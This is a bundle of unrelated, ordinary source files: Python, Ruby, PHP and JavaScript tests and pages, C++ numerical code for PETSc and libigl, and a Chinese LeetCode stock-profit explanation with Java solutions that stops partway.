    """Tests for monitor_api_users, which counts unique client IPs per API
    key via Redis HyperLogLog keys (``apiuser:<action>:<key>:<date>``)."""

    @property
    def today(self):
        return util.utcnow().date()

    @property
    def today_str(self):
        return self.today.strftime('%Y-%m-%d')

    def test_empty(self, celery, stats):
        # No apiuser keys at all -> both gauges report zero.
        monitor_api_users.delay().get()
        stats.check(gauge=[('submit.user', 0), ('locate.user', 0)])

    def test_one_day(self, celery, geoip_data, redis, stats):
        bhutan_ip = geoip_data['Bhutan']['ip']
        london_ip = geoip_data['London']['ip']
        redis.pfadd(
            'apiuser:submit:test:' + self.today_str, bhutan_ip, london_ip)
        redis.pfadd(
            'apiuser:submit:valid_key:' + self.today_str, bhutan_ip)
        redis.pfadd(
            'apiuser:locate:valid_key:' + self.today_str, bhutan_ip)

        monitor_api_users.delay().get()
        # With only today's data the 1d and 7d intervals report the same counts.
        stats.check(gauge=[
            ('submit.user', 1, 2, ['key:test', 'interval:1d']),
            ('submit.user', 1, 2, ['key:test', 'interval:7d']),
            ('submit.user', 1, 1, ['key:valid_key', 'interval:1d']),
            ('submit.user', 1, 1, ['key:valid_key', 'interval:7d']),
            ('locate.user', 1, 1, ['key:valid_key', 'interval:1d']),
            ('locate.user', 1, 1, ['key:valid_key', 'interval:7d']),
        ])

    def test_many_days(self, celery, geoip_data, redis, stats):
        bhutan_ip = geoip_data['Bhutan']['ip']
        london_ip = geoip_data['London']['ip']
        days_6 = (self.today - timedelta(days=6)).strftime('%Y-%m-%d')
        days_7 = (self.today - timedelta(days=7)).strftime('%Y-%m-%d')
        redis.pfadd(
            'apiuser:submit:test:' + self.today_str, '127.0.0.1', bhutan_ip)
        # add the same IPs + one new one again
        redis.pfadd(
            'apiuser:submit:test:' + days_6, '127.0.0.1', bhutan_ip, london_ip)
        # add one entry which is too old
        redis.pfadd(
            'apiuser:submit:test:' + days_7, bhutan_ip)

        monitor_api_users.delay().get()
        stats.check(gauge=[
            ('submit.user', 1, 2, ['key:test', 'interval:1d']),
            # we count unique IPs over the entire 7 day period,
            # so it's just 3 uniques
            ('submit.user', 1, 3, ['key:test', 'interval:7d']),
        ])

        # the too old key was deleted manually
        assert not redis.exists('apiuser:submit:test:' + days_7)
|
"""
Test command line commands.
"""
from pathlib import Path
from subprocess import PIPE, Popen
__author__ = "Sergey Vartanov"
__email__ = "[email protected]"
from xml.etree import ElementTree
from xml.etree.ElementTree import Element
from map_machine.ui.cli import COMMAND_LINES
# Expected stderr produced by a successful `render`/`tile` run; the tests
# below compare subprocess stderr against this byte string verbatim.
LOG: bytes = (
    b"INFO Constructing ways...\n"
    b"INFO Constructing nodes...\n"
    b"INFO Drawing ways...\n"
    b"INFO Drawing main icons...\n"
    b"INFO Drawing extra icons...\n"
    b"INFO Drawing texts...\n"
)
def error_run(arguments: list[str], message: bytes) -> None:
    """Run command that should fail and check error message."""
    command: list[str] = ["map-machine"] + arguments
    with Popen(command, stderr=PIPE) as process:
        _, stderr_data = process.communicate()
        assert process.returncode != 0
        assert stderr_data == message
def run(arguments: list[str], message: bytes) -> None:
    """Run command that should succeed and check its stderr output.

    (The original docstring said "should fail" — a copy-paste from
    ``error_run``; this helper asserts a zero exit code.)
    """
    with Popen(["map-machine"] + arguments, stderr=PIPE) as pipe:
        _, error = pipe.communicate()
        assert pipe.returncode == 0
        assert error == message
def test_wrong_render_arguments() -> None:
    """Test `render` command with wrong arguments."""
    # Zoom alone is not enough: an input source or region must be given.
    error_run(
        ["render", "-z", "17"],
        b"CRITICAL Specify either --input, or --boundary-box, or --coordinates "
        b"and --size.\n",
    )
def test_render() -> None:
    """Test `render` command."""
    run(
        COMMAND_LINES["render"] + ["--cache", "tests/data"],
        LOG + b"INFO Writing output SVG to out/map.svg...\n",
    )
    with Path("out/map.svg").open(encoding="utf-8") as output_file:
        root: Element = ElementTree.parse(output_file).getroot()

    # 8 expected elements: `defs`, `rect` (background), `g` (outline),
    # `g` (icon), and 4 `text` elements (credits).
    assert len(root) == 8
    assert len(root[3][0]) == 0
    assert root.get("width") == "186.0"
    assert root.get("height") == "198.0"
def test_render_with_tooltips() -> None:
    """Test `render` command with tooltips enabled."""
    run(
        COMMAND_LINES["render_with_tooltips"] + ["--cache", "tests/data"],
        LOG + b"INFO Writing output SVG to out/map.svg...\n",
    )
    with Path("out/map.svg").open(encoding="utf-8") as output_file:
        root: Element = ElementTree.parse(output_file).getroot()

    # 8 expected elements: `defs`, `rect` (background), `g` (outline),
    # `g` (icon), and 4 `text` elements (credits).
    assert len(root) == 8
    # The icon group now carries a tooltip (`title`) child.
    assert len(root[3][0]) == 1
    assert root[3][0][0].text == "natural: tree"
    assert root.get("width") == "186.0"
    assert root.get("height") == "198.0"
def test_icons() -> None:
    """Test `icons` command."""
    run(
        COMMAND_LINES["icons"],
        b"INFO Icons are written to out/icons_by_name and out/icons_by_id.\n"
        b"INFO Icon grid is written to out/icon_grid.svg.\n"
        b"INFO Icon grid is written to doc/grid.svg.\n",
    )
    # The command must produce the grid file plus both icon directories.
    assert (Path("out") / "icon_grid.svg").is_file()
    assert (Path("out") / "icons_by_name").is_dir()
    assert (Path("out") / "icons_by_id").is_dir()
    assert (Path("out") / "icons_by_name" / "Röntgen apple.svg").is_file()
    assert (Path("out") / "icons_by_id" / "apple.svg").is_file()
def test_mapcss() -> None:
    """Test `mapcss` command."""
    run(
        COMMAND_LINES["mapcss"],
        b"INFO MapCSS 0.2 scheme is written to out/map_machine_mapcss.\n",
    )
    # The scheme directory must contain the icons and the .mapcss file.
    assert (Path("out") / "map_machine_mapcss").is_dir()
    assert (Path("out") / "map_machine_mapcss" / "icons").is_dir()
    assert (
        Path("out") / "map_machine_mapcss" / "icons" / "apple.svg"
    ).is_file()
    assert (Path("out") / "map_machine_mapcss" / "map_machine.mapcss").is_file()
def test_element() -> None:
    """Test `element` command."""
    run(
        COMMAND_LINES["element"],
        b"INFO Element is written to out/element.svg.\n",
    )
    assert (Path("out") / "element.svg").is_file()
def test_tile() -> None:
    """Test `tile` command."""
    run(
        COMMAND_LINES["tile"] + ["--cache", "tests/data"],
        LOG + b"INFO Tile is drawn to out/tiles/tile_18_160199_88904.svg.\n"
        b"INFO SVG file is rasterized to out/tiles/tile_18_160199_88904.png.\n",
    )
    # Both the vector tile and its rasterized PNG must exist.
    assert (Path("out") / "tiles" / "tile_18_160199_88904.svg").is_file()
    assert (Path("out") / "tiles" / "tile_18_160199_88904.png").is_file()
|
require File.dirname(__FILE__) + '/../../spec_helper'
# include Remote
# Stub class mixing in the remote/EC2 behaviour under test with canned
# configuration values, so no real AWS credentials or API calls are needed.
class TestEC2Class
  include PoolParty::Remote::RemoterBase
  include Ec2
  include CloudResourcer
  include CloudDsl
  def keypair
    "fake_keypair"
  end
  def ami;"ami-abc123";end
  def size; "small";end
  def security_group; "default";end
  def ebs_volume_id; "ebs_volume_id";end
  # NOTE(review): method name is misspelled ("availabilty") — presumably the
  # mixin calls it under this exact name; confirm before renaming.
  def availabilty_zone; "us-east-1a";end
  def verbose
    false
  end
  def ec2
    # Memoized EC2 client built with dummy credentials.
    @ec2 ||= EC2::Base.new( :access_key_id => "not_an_access_key", :secret_access_key => "not_a_secret_access_key")
  end
end
describe "ec2 remote base" do
  before(:each) do
    setup
    @tr = TestEC2Class.new
    stub_remoter_for(@tr)
    # Canned instance listing so no network call is made.
    @tr.stub!(:get_instances_description).and_return response_list_of_instances
  end
  # Generate one example per expected public method.
  %w(launch_new_instance! terminate_instance! describe_instance describe_instances create_snapshot).each do |method|
    eval <<-EOE
      it "should have the method #{method}" do
        @tr.respond_to?(:#{method}).should == true
      end
    EOE
  end
  describe "helpers" do
    it "should be able to convert an ec2 ip to a real ip" do
      "ec2-72-44-36-12.compute-1.amazonaws.com".convert_from_ec2_to_ip.should == "72.44.36.12"
    end
    it "should not throw an error if another string is returned" do
      "72.44.36.12".convert_from_ec2_to_ip.should == "72.44.36.12"
    end
    it "should be able to parse the date from the timestamp" do
      "2008-11-13T09:33:09+0000".parse_datetime.should == DateTime.parse("2008-11-13T09:33:09+0000")
    end
    it "should rescue itself and just return the string if it fails" do
      "thisisthedate".parse_datetime.should == "thisisthedate"
    end
  end
  describe "launching" do
    before(:each) do
      @tr.ec2.stub!(:run_instances).and_return true
    end
    it "should call run_instances on the ec2 Base class when asking to launch_new_instance!" do
      @tr.ec2.should_receive(:run_instances).and_return true
      @tr.launch_new_instance!
    end
    it "should use a specific security group if one is specified" do
      @tr.stub!(:security_group).and_return "web"
      @tr.ec2.should_receive(:run_instances).with(hash_including(:group_id => ['web'])).and_return true
      @tr.launch_new_instance!
    end
    it "should use the default security group if none is specified" do
      @tr.ec2.should_receive(:run_instances).with(hash_including(:group_id => ['default'])).and_return true
      @tr.launch_new_instance!
    end
    it "should get the hash response from EC2ResponseObject" do
      EC2ResponseObject.should_receive(:get_hash_from_response).and_return true
      @tr.launch_new_instance!
    end
  end
  describe "terminating" do
    it "should call terminate_instance! on ec2 when asking to terminate_instance!" do
      @tr.ec2.should_receive(:terminate_instances).with(:instance_id => "abc-123").and_return true
      @tr.terminate_instance!("abc-123")
    end
  end
  describe "describe_instance" do
    it "should call get_instances_description on itself" do
      @tr.should_receive(:get_instances_description).and_return {}
      @tr.describe_instance
    end
  end
  describe "get_instances_description" do
    # Relies on the canned response_list_of_instances fixture set up above.
    it "should return a hash" do
      @tr.describe_instances.class.should == Array
    end
    it "should call the first node master" do
      @tr.describe_instances.first[:name].should == "master"
    end
    it "should call the second one node1" do
      @tr.describe_instances[1][:name].should == "node1"
    end
    it "should call the third node2" do
      @tr.describe_instances[2][:name].should == "terminated_node2"
    end
  end
  describe "create_keypair" do
    before(:each) do
      Kernel.stub!(:system).with("ec2-add-keypair fake_keypair > #{Base.base_keypair_path}/id_rsa-fake_keypair && chmod 600 #{Base.base_keypair_path}/id_rsa-fake_keypair").and_return true
    end
    it "should send system to the Kernel" do
      Kernel.should_receive(:system).with("ec2-add-keypair fake_keypair > #{Base.base_keypair_path}/id_rsa-fake_keypair && chmod 600 #{Base.base_keypair_path}/id_rsa-fake_keypair").and_return true
      @tr.create_keypair
    end
    it "should try to create the directory when making a new keypair" do
      FileUtils.should_receive(:mkdir_p).and_return true
      ::File.stub!(:directory?).and_return false
      @tr.create_keypair
    end
    it "should not create a keypair if the keypair is nil" do
      Kernel.should_not_receive(:system)
      @tr.stub!(:keypair).and_return nil
      @tr.create_keypair
    end
  end
  describe "create_snapshot" do
    # We can assume that create_snapshot on the ec2 gem works
    before(:each) do
      @tr.ec2.stub!(:create_snapshot).and_return nil
    end
    it "should create a snapshot of the current EBS volume" do
      @tr.ec2.stub!(:create_snapshot).and_return {{"snapshotId" => "snap-123"}}
      @tr.stub!(:ebs_volume_id).and_return "vol-123"
      @tr.create_snapshot.should == {"snapshotId" => "snap-123"}
    end
    it "should not create a snapshot if there is no EBS volume" do
      @tr.create_snapshot.should == nil
    end
  end
end
/**
* \file main.cpp
* \brief An example and benchmark of AmgX and PETSc with Poisson system.
*
* The Poisson equation we solve here is
* \nabla^2 u(x, y) = -8\pi^2 \cos{2\pi x} \cos{2\pi y}
* for 2D. And
* \nabla^2 u(x, y, z) = -12\pi^2 \cos{2\pi x} \cos{2\pi y} \cos{2\pi z}
* for 3D.
*
* The exact solutions are
* u(x, y) = \cos{2\pi x} \cos{2\pi y}
* for 2D. And
* u(x, y, z) = \cos{2\pi x} \cos{2\pi y} \cos{2\pi z}
* for 3D.
*
* \author Pi-Yueh Chuang ([email protected])
* \date 2017-06-26
*/
// PETSc
# include <petsctime.h>
# include <petscsys.h>
# include <petscmat.h>
# include <petscvec.h>
# include <petscksp.h>
// headers
# include "helper.h"
// constants
// Negative sizes follow the PETSc DMDA convention: the magnitude (100) is a
// default that can be overridden at run time with -da_grid_x/y/z options.
# define Nx -100
# define Ny -100
# define Nz -100
/**
 * \brief Build a Poisson system, solve it with a CG KSP, and report timing,
 * iteration count, final residual and maximum error against the exact
 * solution.
 */
int main(int argc, char **argv)
{
    PetscErrorCode ierr; // error codes returned by PETSc routines

    DM da; // DM object
    DMDALocalInfo info; // partitioning info

    Vec lhs, // left hand side
        rhs, // right hand side
        exact; // exact solution

    Mat A; // coefficient matrix

    KSP ksp; // PETSc KSP solver instance
    KSPConvergedReason reason; // KSP convergence/divergence reason

    PetscInt Niters; // iterations used to converge
    PetscReal res, // final residual
              Linf; // maximum norm

    PetscLogDouble start, // time at the begining
                   initSys, // time after init the sys
                   initSolver, // time after init the solver
                   solve; // time after solve

    char config[PETSC_MAX_PATH_LEN]; // config file name

    // initialize MPI and PETSc
    ierr = MPI_Init(&argc, &argv); CHKERRQ(ierr);
    ierr = PetscInitialize(&argc, &argv, nullptr, nullptr); CHKERRQ(ierr);

    // allow PETSc to read run-time options from a file
    ierr = PetscOptionsGetString(nullptr, nullptr, "-config",
            config, PETSC_MAX_PATH_LEN, nullptr); CHKERRQ(ierr);
    ierr = PetscOptionsInsertFile(PETSC_COMM_WORLD,
            nullptr, config, PETSC_FALSE); CHKERRQ(ierr);

    // get time
    ierr = PetscTime(&start); CHKERRQ(ierr);

    // prepare the linear system
    ierr = createSystem(Nx, Ny, Nz, da, A, lhs, rhs, exact); CHKERRQ(ierr);

    // get system info
    ierr = DMDAGetLocalInfo(da, &info); CHKERRQ(ierr);

    // get time
    ierr = PetscTime(&initSys); CHKERRQ(ierr);

    // create a CG solver that reuses its preconditioner between solves
    ierr = KSPCreate(PETSC_COMM_WORLD, &ksp); CHKERRQ(ierr);
    ierr = KSPSetOperators(ksp, A, A); CHKERRQ(ierr);
    ierr = KSPSetType(ksp, KSPCG); CHKERRQ(ierr);
    ierr = KSPSetReusePreconditioner(ksp, PETSC_TRUE); CHKERRQ(ierr);
    ierr = KSPSetFromOptions(ksp); CHKERRQ(ierr);
    ierr = KSPSetUp(ksp); CHKERRQ(ierr);

    // get time
    ierr = PetscTime(&initSolver); CHKERRQ(ierr);

    // solve the system
    ierr = KSPSolve(ksp, rhs, lhs); CHKERRQ(ierr);

    // get time
    ierr = PetscTime(&solve); CHKERRQ(ierr);

    // check if the solver converged
    ierr = KSPGetConvergedReason(ksp, &reason); CHKERRQ(ierr);
    if (reason < 0) SETERRQ1(PETSC_COMM_WORLD,
            PETSC_ERR_CONV_FAILED, "Divergence reason: %d\n", reason);

    // get the number of iterations
    ierr = KSPGetIterationNumber(ksp, &Niters); CHKERRQ(ierr);

    // get the L2 norm of final residual
    // (fix: the error code was previously assigned but never checked)
    ierr = KSPGetResidualNorm(ksp, &res); CHKERRQ(ierr);

    // calculate error norm (maximum norm) in-place: lhs <- lhs - exact
    ierr = VecAXPY(lhs, -1.0, exact); CHKERRQ(ierr);
    ierr = VecNorm(lhs, NORM_INFINITY, &Linf); CHKERRQ(ierr);

    // print result
    ierr = PetscPrintf(PETSC_COMM_WORLD,
            "[Nx, Ny, Nz]: [%d, %d, %d]\n" "Number of iterations: %d\n"
            "L2 norm of final residual: %f\n" "Maximum norm of error: %f\n"
            "Time [init, create solver, solve]: [%f, %f, %f]\n",
            info.mx, info.my, info.mz, Niters, res, Linf,
            initSys-start, initSolver-initSys, solve-initSolver); CHKERRQ(ierr);

    // destroy KSP solver
    ierr = KSPDestroy(&ksp); CHKERRQ(ierr);

    // destroy the linear system
    ierr = destroySystem(da, A, lhs, rhs, exact); CHKERRQ(ierr);

    // finalize PETSc and MPI
    ierr = PetscFinalize(); CHKERRQ(ierr);
    ierr = MPI_Finalize(); CHKERRQ(ierr);

    return ierr;
}
|
<?php
/*
* This file is part of the PHPBench package
*
* (c) Daniel Leech <[email protected]>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*
*/
namespace PhpBench\Tests\Unit\Progress\Logger;
use PhpBench\Model\Benchmark;
use PhpBench\Model\Iteration;
use PhpBench\Model\ParameterSet;
use PhpBench\Model\Subject;
use PhpBench\Model\Variant;
use PhpBench\Progress\Logger\HistogramLogger;
use PhpBench\Tests\Util\TestUtil;
use PhpBench\Util\TimeUnit;
use PHPUnit\Framework\TestCase;
use Symfony\Component\Console\Output\BufferedOutput;
class HistogramLoggerTest extends TestCase
{
    /**
     * Build a HistogramLogger writing to a buffered output, with a prophesied
     * benchmark/subject/iteration and a real 4-iteration Variant.
     */
    public function setUp()
    {
        $this->output = new BufferedOutput();
        $this->timeUnit = new TimeUnit(TimeUnit::MICROSECONDS, TimeUnit::MILLISECONDS);
        $this->logger = new HistogramLogger($this->timeUnit);
        $this->logger->setOutput($this->output);
        $this->benchmark = $this->prophesize(Benchmark::class);
        $this->subject = $this->prophesize(Subject::class);
        $this->iteration = $this->prophesize(Iteration::class);
        $this->variant = new Variant(
            $this->subject->reveal(),
            new ParameterSet(),
            1,
            0
        );
        $this->variant->spawnIterations(4);
        $this->benchmark->getSubjects()->willReturn([
            $this->subject->reveal(),
        ]);
        $this->benchmark->getClass()->willReturn('BenchmarkTest');

        $this->subject->getName()->willReturn('benchSubject');
        $this->subject->getIndex()->willReturn(1);
        $this->subject->getOutputTimeUnit()->willReturn('milliseconds');
        $this->subject->getOutputMode()->willReturn('time');
        $this->subject->getRetryThreshold()->willReturn(10);
        $this->subject->getOutputTimePrecision()->willReturn(3);
    }

    /**
     * It should show the benchmark name and list all of the subjects.
     */
    public function testBenchmarkStart()
    {
        $this->logger->benchmarkStart($this->benchmark->reveal());
        $display = $this->output->fetch();
        $this->assertContains('BenchmarkTest', $display);
        $this->assertContains('#1 benchSubject', $display);
    }

    /**
     * Test iteration start.
     */
    public function testIterationStart()
    {
        $this->iteration->getIndex()->willReturn(1);
        $this->iteration->getVariant()->willReturn($this->variant);
        $this->logger->iterationStart($this->iteration->reveal());
        $display = $this->output->fetch();
        $this->assertContains('it 1/4', $display);
    }

    /**
     * It should show information at the start of the variant.
     */
    public function testIterationsStart()
    {
        $this->logger->variantStart($this->variant);
        $display = $this->output->fetch();
        $this->assertContains(
            '1 (σ = 0.000ms ) -2σ [        ] +2σ',
            $display
        );
        $this->assertContains(
            'benchSubject',
            $display
        );
        $this->assertContains(
            'parameters []',
            $display
        );
    }

    /**
     * It should show an error if the iteration has an exception.
     */
    public function testIterationException()
    {
        $this->variant->setException(new \Exception('foo'));
        $this->logger->variantEnd($this->variant);
        $this->assertContains('ERROR', $this->output->fetch());
    }

    /**
     * It should show the histogram and statistics when an iteration is
     * completed (and there were no rejections).
     */
    public function testIterationEnd()
    {
        // Give every iteration identical results so the stats are exact.
        foreach ($this->variant as $iteration) {
            foreach (TestUtil::createResults(10, 10) as $result) {
                $iteration->setResult($result);
            }
        }
        $this->variant->computeStats();
        $this->logger->variantEnd($this->variant);
        $display = $this->output->fetch();
        $this->assertContains(
            '1 (σ = 0.000ms ) -2σ [   █    ] +2σ [μ Mo]/r: 0.010 0.010 μRSD/r: 0.00%',
            $display
        );
    }
}
|
// This file is part of libigl, a simple c++ geometry processing library.
//
// Copyright (C) 2018 Zhongshi Jiang <[email protected]>
//
// This Source Code Form is subject to the terms of the Mozilla Public License
// v. 2.0. If a copy of the MPL was not distributed with this file, You can
// obtain one at http://mozilla.org/MPL/2.0/.
#include "mapping_energy_with_jacobians.h"
#include "polar_svd.h"
// Compute the total mapping energy for a set of per-element Jacobians.
//
// Inputs:
//   Ji          #elements by 4 (2D) or 9 (3D) row-major Jacobians.
//   areas       per-element areas/volumes used as weights.
//   slim_energy which distortion energy to accumulate.
//   exp_factor  scaling used inside the exponential energies.
// Returns the area-weighted sum of the chosen energy over all elements.
//
// Fix: the 3D EXP_CONFORMAL branch previously ignored exp_factor, unlike
// its 2D counterpart; both now compute exp(exp_factor * conformal_term).
IGL_INLINE double igl::mapping_energy_with_jacobians(
  const Eigen::MatrixXd &Ji,
  const Eigen::VectorXd &areas,
  igl::MappingEnergyType slim_energy,
  double exp_factor){

  double energy = 0;

  if (Ji.cols() == 4)
  {
    Eigen::Matrix<double, 2, 2> ji;
    for (int i = 0; i < Ji.rows(); i++)
    {
      ji(0, 0) = Ji(i, 0);
      ji(0, 1) = Ji(i, 1);
      ji(1, 0) = Ji(i, 2);
      ji(1, 1) = Ji(i, 3);

      typedef Eigen::Matrix<double, 2, 2> Mat2;
      typedef Eigen::Matrix<double, 2, 1> Vec2;
      Mat2 ri, ti, ui, vi;
      Vec2 sing;
      // Singular values s1, s2 of the Jacobian measure the local stretch.
      igl::polar_svd(ji, ri, ti, ui, sing, vi);
      double s1 = sing(0);
      double s2 = sing(1);

      switch (slim_energy)
      {
        case igl::MappingEnergyType::ARAP:
        {
          energy += areas(i) * (pow(s1 - 1, 2) + pow(s2 - 1, 2));
          break;
        }
        case igl::MappingEnergyType::SYMMETRIC_DIRICHLET:
        {
          energy += areas(i) * (pow(s1, 2) + pow(s1, -2) + pow(s2, 2) + pow(s2, -2));
          break;
        }
        case igl::MappingEnergyType::EXP_SYMMETRIC_DIRICHLET:
        {
          energy += areas(i) * exp(exp_factor * (pow(s1, 2) + pow(s1, -2) + pow(s2, 2) + pow(s2, -2)));
          break;
        }
        case igl::MappingEnergyType::LOG_ARAP:
        {
          energy += areas(i) * (pow(log(s1), 2) + pow(log(s2), 2));
          break;
        }
        case igl::MappingEnergyType::CONFORMAL:
        {
          energy += areas(i) * ((pow(s1, 2) + pow(s2, 2)) / (2 * s1 * s2));
          break;
        }
        case igl::MappingEnergyType::EXP_CONFORMAL:
        {
          energy += areas(i) * exp(exp_factor * ((pow(s1, 2) + pow(s2, 2)) / (2 * s1 * s2)));
          break;
        }
        default:
        {
          // Unsupported energy types contribute nothing.
          break;
        }
      }
    }
  }
  else
  {
    Eigen::Matrix<double, 3, 3> ji;
    for (int i = 0; i < Ji.rows(); i++)
    {
      ji(0, 0) = Ji(i, 0);
      ji(0, 1) = Ji(i, 1);
      ji(0, 2) = Ji(i, 2);
      ji(1, 0) = Ji(i, 3);
      ji(1, 1) = Ji(i, 4);
      ji(1, 2) = Ji(i, 5);
      ji(2, 0) = Ji(i, 6);
      ji(2, 1) = Ji(i, 7);
      ji(2, 2) = Ji(i, 8);

      typedef Eigen::Matrix<double, 3, 3> Mat3;
      typedef Eigen::Matrix<double, 3, 1> Vec3;
      Mat3 ri, ti, ui, vi;
      Vec3 sing;
      igl::polar_svd(ji, ri, ti, ui, sing, vi);
      double s1 = sing(0);
      double s2 = sing(1);
      double s3 = sing(2);

      switch (slim_energy)
      {
        case igl::MappingEnergyType::ARAP:
        {
          energy += areas(i) * (pow(s1 - 1, 2) + pow(s2 - 1, 2) + pow(s3 - 1, 2));
          break;
        }
        case igl::MappingEnergyType::SYMMETRIC_DIRICHLET:
        {
          energy += areas(i) * (pow(s1, 2) + pow(s1, -2) + pow(s2, 2) + pow(s2, -2) + pow(s3, 2) + pow(s3, -2));
          break;
        }
        case igl::MappingEnergyType::EXP_SYMMETRIC_DIRICHLET:
        {
          energy += areas(i) * exp(exp_factor *
            (pow(s1, 2) + pow(s1, -2) + pow(s2, 2) + pow(s2, -2) + pow(s3, 2) + pow(s3, -2)));
          break;
        }
        case igl::MappingEnergyType::LOG_ARAP:
        {
          // abs() guards against a negative singular value from a reflection.
          energy += areas(i) * (pow(log(s1), 2) + pow(log(std::abs(s2)), 2) + pow(log(std::abs(s3)), 2));
          break;
        }
        case igl::MappingEnergyType::CONFORMAL:
        {
          energy += areas(i) * ((pow(s1, 2) + pow(s2, 2) + pow(s3, 2)) / (3 * pow(s1 * s2 * s3, 2. / 3.)));
          break;
        }
        case igl::MappingEnergyType::EXP_CONFORMAL:
        {
          // Fixed: apply exp_factor as in the 2D branch above.
          energy += areas(i) * exp(exp_factor * ((pow(s1, 2) + pow(s2, 2) + pow(s3, 2)) / (3 * pow(s1 * s2 * s3, 2. / 3.))));
          break;
        }
        default:
        {
          break;
        }
      }
    }
  }

  return energy;
}
#ifdef IGL_STATIC_LIBRARY
// Explicit template instantiation
#endif
|
import type { CustomNextPage } from "next";
import { useState } from "react";
import { useForm } from "react-hook-form";
import { useManageAccount } from "src/hook/vendor/useManageAccount";
import { Layout } from "src/layout";
import {
Attention,
InputLayout,
InputType,
} from "src/pages/vendor/auth/component";
import type {
TypeEmail,
TypeRadio,
TypeSelect,
TypeTel,
TypeText,
TypeTextarea,
TypeUrl,
} from "src/type/vendor";
import type Stripe from "stripe";
// Form-field definitions rendered by the account-creation form below.
// Only the email field is currently active; the commented-out entries are
// disabled Stripe onboarding fields kept for future use.
const inputItems: (
  | TypeEmail
  | TypeRadio
  | TypeSelect
  | TypeTel
  | TypeText
  | TypeUrl
  | TypeTextarea
)[] = [
  // {
  //   id: "business_type",
  //   label: "事業形態",
  //   type: "radio",
  //   radioItem: [{ id: "individual" }, { id: "company" }, { id: "non_profit" }],
  // },
  // {
  //   id: "first_name_kanji",
  //   label: "氏名",
  //   type: "text",
  //   placeholder: "姓",
  // },
  // {
  //   id: "last_name_kanji",
  //   label: "氏名",
  //   type: "text",
  //   placeholder: "名",
  // },
  // {
  //   id: "first_name_kana",
  //   label: "氏名(かな)",
  //   type: "text",
  //   placeholder: "姓",
  // },
  // {
  //   id: "last_name_kana",
  //   label: "氏名(かな)",
  //   type: "text",
  //   placeholder: "名",
  // },
  {
    id: "email",
    label: "メールアドレス",
    type: "email",
    autoComplete: "email",
    placeholder: "[email protected]",
  },
  // {
  //   id: "businessProfileMcc",
  //   label: "事業カテゴリー",
  //   type: "select",
  //   selectItem: [
  //     { value: "", text: "選んでください。" },
  //     { value: "Dog", text: "Dog" },
  //     { value: "Cat", text: "Cat" },
  //     { value: "Bird", text: "Bird" },
  //   ],
  // },
  // {
  //   id: "businessProfileProductDescription",
  //   label: "事業詳細",
  //   type: "textarea",
  // },
];
/**
 * Vendor account creation page: collects the form fields defined in
 * `inputItems`, creates a Stripe account and redirects the vendor to the
 * Stripe onboarding link.
 */
const Create: CustomNextPage = () => {
  const [isLoading, setIsLoading] = useState(false);
  const { createAccount, createAccountLink } = useManageAccount();
  const {
    register,
    handleSubmit,
    formState: { errors },
  } = useForm();

  const onSubmit = async (e: any) => {
    setIsLoading(true);
    // try/finally guarantees the spinner is cleared even when account
    // creation or link creation throws, so the form stays usable.
    try {
      const params: Stripe.AccountCreateParams = { ...e };
      const { id } = await createAccount(params);
      await createAccountLink(id);
    } finally {
      setIsLoading(false);
    }
  };

  return (
    <div className="mx-auto max-w-[700px] text-center">
      <div className="space-y-3">
        <h2>チケットオーナーアカウント作成</h2>
        <Attention />
        <div className="p-10 rounded-lg border border-gray">
          <form onSubmit={handleSubmit(onSubmit)} className="text-center">
            {inputItems.map((item) => {
              return (
                <InputLayout key={item.id} item={item} errorMessage={errors}>
                  <InputType item={item} register={register} />
                </InputLayout>
              );
            })}
            <div className="relative py-2 px-5">
              <input type="submit" value="送信" />
              {isLoading && (
                <div className="flex absolute inset-0 justify-center bg-white">
                  <div className="w-5 h-5 rounded-full border-4 border-blue border-t-transparent animate-spin"></div>
                </div>
              )}
            </div>
          </form>
        </div>
      </div>
    </div>
  );
};

Create.getLayout = Layout;

export default Create;
|
买卖股票的最佳时机 II
我们必须确定通过交易能够获得的最大利润(对于交易次数没有限制)。为此,我们需要找出那些共同使得利润最大化的买入及卖出价格。
解决方案
方法一:暴力法
这种情况下,我们只需要计算与所有可能的交易组合相对应的利润,并找出它们中的最大利润。
class Solution {
    // Entry point: maximum total profit with an unlimited number of
    // non-overlapping buy/sell transactions.
    public int maxProfit(int[] prices) {
        return calculate(prices, 0);
    }

    // Recursively tries every valid buy/sell pair starting at index s and
    // returns the best total profit achievable from that point onward.
    public int calculate(int prices[], int s) {
        if (s >= prices.length)
            return 0;
        int max = 0;
        for (int start = s; start < prices.length; start++) {
            int maxprofit = 0;
            for (int i = start + 1; i < prices.length; i++) {
                if (prices[start] < prices[i]) {
                    // Profit of buying at `start` and selling at `i`, plus
                    // the best profit obtainable from the remaining days.
                    int profit = calculate(prices, i + 1) + prices[i] - prices[start];
                    if (profit > maxprofit)
                        maxprofit = profit;
                }
            }
            if (maxprofit > max)
                max = maxprofit;
        }
        return max;
    }
}
复杂度分析
时间复杂度:O(n^n),递归函数被调用 n^n 次。
空间复杂度:O(n),递归的深度为 n。
方法二:峰谷法
算法
假设给定的数组为:
[7, 1, 5, 3, 6, 4]
如果我们在图表上绘制给定数组中的数字,我们将会得到:
Profit Graph
如果我们分析图表,那么我们的兴趣点是连续的峰和谷。
https://pic.leetcode-cn.com/d447f96d20d1cfded20a5d08993b3658ed08e295ecc9aea300ad5e3f4466e0fe-file_1555699515174
用数学语言描述为:
Total\ Profit = \sum_{i} \big(height(peak_i) - height(valley_i)\big)
关键是我们需要考虑到紧跟谷的每一个峰值以最大化利润。如果我们试图跳过其中一个峰值来获取更多利润,那么我们最终将失去其中一笔交易中获得的利润,从而导致总利润的降低。
例如,在上述情况下,如果我们跳过 peak_i 和 valley_j,试图通过考虑差异较大的点以获取更多的利润,那么获得的净利润总是会小于包含它们而获得的净利润,因为 C 总是小于 A+B。
class Solution {
    // Peak-valley approach: walk the prices, find each valley followed by
    // the next peak, and add every (peak - valley) difference.
    public int maxProfit(int[] prices) {
        int i = 0;
        int valley = prices[0];
        int peak = prices[0];
        int maxprofit = 0;
        while (i < prices.length - 1) {
            // Descend to the next local minimum (valley).
            while (i < prices.length - 1 && prices[i] >= prices[i + 1])
                i++;
            valley = prices[i];
            // Climb to the next local maximum (peak).
            while (i < prices.length - 1 && prices[i] <= prices[i + 1])
                i++;
            peak = prices[i];
            maxprofit += peak - valley;
        }
        return maxprofit;
    }
}
复杂度分析
时间复杂度:O(n)。只需遍历一次。
空间复杂度:O(1)。只需要常量的空间。
方法三:简单的一次遍历
算法
